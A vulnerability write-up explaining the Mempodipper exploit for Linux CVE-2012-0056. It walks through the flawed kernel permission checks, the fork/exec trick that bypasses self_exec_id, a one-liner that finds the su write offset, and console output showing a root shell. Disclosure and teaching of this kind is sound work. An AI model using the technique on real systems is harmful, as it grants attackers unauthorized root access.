Linux Local Privilege Escalation via SUID /proc/pid/mem Write


Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process's virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, and so the prior #ifdef that prevented write support for writing to arbitrary process memory was removed. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. This means that all Linux kernels >=2.6.39 are vulnerable, up until the fix commit for it a couple days ago. Let's take the old kernel code step by step and learn what's the matter with it.

When /proc/pid/mem is opened, this kernel code is called:

static int mem_open(struct inode* inode, struct file* file)
    file->private_data = (void*)((long)current->self_exec_id);
    /* OK to pass negative loff_t, we can catch out-of-range */
    file->f_mode |= FMODE_UNSIGNED_OFFSET;
    return 0;

There are no restrictions on opening; anyone can open the /proc/pid/mem fd for any process (subject to the ordinary VFS restrictions). It simply makes note of the original process's self_exec_id that it was opened with and stores this away for checking later during reads and writes.

Writes (and reads), however, have permissions checking restrictions. Let's take a look at the write function:

static ssize_t mem_write(struct file * file, const char __user *buf,
             size_t count, loff_t *ppos)

/* unimportant code removed for blog post */

    struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);

/* unimportant code removed for blog post */

    mm = check_mem_permission(task);
    copied = PTR_ERR(mm);
    if (IS_ERR(mm))
        goto out_free;

/* unimportant code removed for blog post */

    if (file->private_data != (void *)((long)current->self_exec_id))
        goto out_mm;

/* unimportant code removed for blog post
 * (the function here goes onto write the buffer into the memory)

So there are two relevant checks in place to prevent against unauthorized writes: check_mem_permission and self_exec_id. Let's do the first one first and second one second.

The code of check_mem_permission simply calls into __check_mem_permission, so here's the code of that:

static struct mm_struct *__check_mem_permission(struct task_struct *task)
    struct mm_struct *mm;

    mm = get_task_mm(task);
    if (!mm)
        return ERR_PTR(-EINVAL);

     * A task can always look at itself, in case it chooses
     * to use system calls instead of load instructions.
    if (task == current)
        return mm;

     * If current is actively ptrace'ing, and would also be
     * permitted to freshly attach with ptrace now, permit it.
    if (task_is_stopped_or_traced(task)) {
        int match;
        match = (ptrace_parent(task) == current);
        if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH))
            return mm;

     * No one else is allowed.
    return ERR_PTR(-EPERM);

There are two ways that the memory write is authorized. Either task == current, meaning that the process being written to is the process writing, or current (the process writing) has esoteric ptrace-level permissions to play with task (the process being written to). Maybe you think you can trick the ptrace code? It's tempting. But I don't know. Let's instead figure out how we can make a process write arbitrary memory to itself, so that task == current.

Now naturally, we want to write into the memory of suid processes, since then we can get root. Take a look at this:

$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy

su will spit out whatever text you want onto stderr, prefixed by "Unknown id:". So, we can open a fd to /proc/self/mem, lseek to the right place in memory for writing (more on that later), use dup2 to couple together stderr and the mem fd, and then exec to su $shellcode to write an shell spawner to the process memory, and then we have root. Really? Not so easy.

Here the other restriction comes into play. After it passes the task == current test, it then checks to see if the current self_exec_id matches the self_exec_id that the fd was opened with. What on earth is self_exec_id? It's only referenced a few places in the kernel. The most important one happens to be inside of exec:

void setup_new_exec(struct linux_binprm * bprm)
/* massive amounts of code trimmed for the purpose of this blog post */

    /* An exec changes our domain. We are no longer part of the thread
       group */


    flush_signal_handlers(current, 0);

self_exec_id is incremented each time a process execs. So in this case, it functions so that you can't open the fd in a non-suid process, dup2, and then exec to a suid process... which is exactly what we were trying to do above. Pretty clever way of deterring our attack, eh?

Here's how to get around it. We fork a child, and inside of that child, we exec to a new process. The initial child fork has a self_exec_id equal to its parent. When we exec to a new process, self_exec_id increments by one. Meanwhile, the parent itself is busy execing to our shellcode writing su process, so its self_exec_id gets incremented to the same value. So what we do is -- we make this child fork and exec to a new process, and inside of that new process, we open up a fd to /proc/parent-pid/mem using the pid of the parent process, not our own process (as was the case prior). We can open the fd like this because there is no permissions checking for a mere open. When it is opened, its self_exec_id has already incremented to the right value that the parent's self_exec_id will be when we exec to su. So finally, we pass our opened fd from the child process back to the parent process (using some very black unix domain sockets magic), do our dup2ing, and exec into su with the shell code.

There is one remaining objection. Where do we write to? We have to lseek to the proper memory location before writing, and ASLR randomizes processes address spaces making it impossible to know where to write to. Should we spend time working on more cleverness to figure out how to read process memory, and then carry out a search? No. Check this out:

$ readelf -h /bin/su | grep Type
   Type:                              EXEC (Executable file)

This means that su does not have a relocatable .text section (otherwise it would spit out "DYN" instead of "EXEC"). It turns out that su on the vast majority of distros is not compiled with PIE, disabling ASLR for the .text section of the binary! So we've chosen su wisely. The offsets in memory will always be the same. So to find the right place to write to, let's check out the assembly surrounding the printing of the "Unknown id: blabla" error message.

It gets the error string here:

  403677:       ba 05 00 00 00          mov    $0x5,%edx
  40367c:       be ff 64 40 00          mov    $0x4064ff,%esi
  403681:       31 ff                   xor    %edi,%edi
  403683:       e8 e0 ed ff ff          callq  402468 (dcgettext@plt)

And then writes it to stderr:

  403688:       48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi        # 6087e8 (stderr)
  40368f:       48 89 c2                mov    %rax,%rdx
  403692:       b9 20 88 60 00          mov    $0x608820,%ecx
  403697:       be 01 00 00 00          mov    $0x1,%esi
  40369c:       31 c0                   xor    %eax,%eax
  40369e:       e8 75 ea ff ff          callq  402118 (__fprintf_chk@plt)

Closes the log:

  4036a3:       e8 f0 eb ff ff          callq  402298 (closelog@plt)

And then exits the program:

  4036a8:       bf 01 00 00 00          mov    $0x1,%edi
  4036ad:       e8 c6 ea ff ff          callq  402178 (exit@plt)

We therefore want to use 0x402178, which is the exit function it calls. We can, in an exploit, automate the finding of the exit@plt symbol with a simple bash one-liner:

$ objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'

So naturally, we want to write to 0x402178 minus the number of letters in the string "Unknown id: ", so that our shellcode is placed at exactly the right place.

The shellcode should be simple and standard. It sets the uid and gid to 0 and execs into a shell. If we want to be clever, we can reopen stderr by, prior to dup2ing the memory fd to stderr, we choose another fd to dup stderr to, and then in the shellcode, we dup2 that other fd back to stderr.

In the end, the exploit works like a charm with total reliability:

CVE-2012-0056 $ ls
build-and-run-exploit.sh  build-and-run-shellcode.sh  mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper 
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami

You can watch a video of it in action.

Thanks to Dan Rosenberg for his continued advice and support. I'm currently not releasing any source code, as Linus only very recently patched it. After a responsible amount of time passes or if someone else does first, I'll publish. If you're a student trying to learn about things or have otherwise legitimate reasons, we can talk.

Update: evidently, based on this blog post, ironically, some other folks made exploits and published them. So, here's mine. I wrote the shellcode for 32-bit and 64-bit by hand. Enjoy!

Update 2: as it turns out, Fedora very aptly compiles their su with PIE, which defeats this attack. They do not, unfortunately, compile all their SUID binaries with PIE, and so this attack is still possible with, for example, gpasswd. The code to do this is in the "fedora" branch of the git repository, and a video demonstration is also available.

Update 3: Gentoo is smart enough to remove read permissions on SUID binaries, making it impossible to find the exit@plt offset using objdump. I determined another way to do this, using ptrace. Ptrace allows debugging of any program in memory. For SUID programs, ptracing will drop its privileges, but that's fine, since we simply want to find internal memory locations. By parsing the opcode of the binary at the right time, we can decipher the target address of the next call after the printing of the error message. I've created a standalone utility that returns the offset, as well as integrating it into the main mempodipper source.

{As always, this is work here is strictly academic, and is not intended for use beyond research and education.}